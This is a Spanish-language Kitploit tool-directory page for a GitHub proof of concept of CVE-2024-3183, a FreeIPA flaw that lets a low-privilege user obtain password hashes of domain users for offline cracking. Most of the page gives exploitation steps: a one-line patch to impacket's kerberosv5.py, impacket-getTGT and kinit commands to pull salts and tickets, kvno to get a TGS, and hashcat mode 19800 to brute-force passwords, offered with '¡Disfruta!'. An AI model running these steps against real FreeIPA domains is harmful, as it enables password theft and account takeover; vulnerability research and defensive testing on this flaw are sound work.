Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-3183-POC — POC para CVE-2024-3183 (FreeIPA Rosting) | Kitploit
Herramientas/GitHubGitHub/im10n/cve-2024-3183-poc
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticación
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

POC para CVE-2024-3183 (FreeIPA Rosting)

Ver Repositorio
2924hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-3183-POC

POC para CVE-2024-3183 (FreeIPA Rosting)

Impacto: Un usuario con pocos privilegios puede obtener un hash de las contraseñas de todos los usuarios del dominio y realizar fuerza bruta offline (kerberoasting).

Parche para impacket-getTGT:

  1. Añade decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.
  2. ¡Disfruta!

POC1:

  1. Añade decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.
  2. Puedes usar impacket-getTGT con las opciones -service y -debug para obtener la salt en un solo comando. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. Primero, solicitemos un ticket TGT para un usuario ya comprometido "admin". foto1
  2. En segundo lugar, averiguaremos la salt del usuario "admin": printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. Obtén el TGS para "admin": kvno admin foto foto3
  4. Usa el script de Python (o hashcat mod 19800 con salt específica) para fuerza bruta del TGS foto4

1 - TGS, 2 - SALT, 3 - Contraseñas.

  1. Felicidades, ya tenemos la contraseña del usuario "admin".

POC3:

  1. Puedes usar kinit en un solo paso: kinit -S target user

y obtienes un TGT cifrado con la clave del usuario objetivo.

Descargar herramienta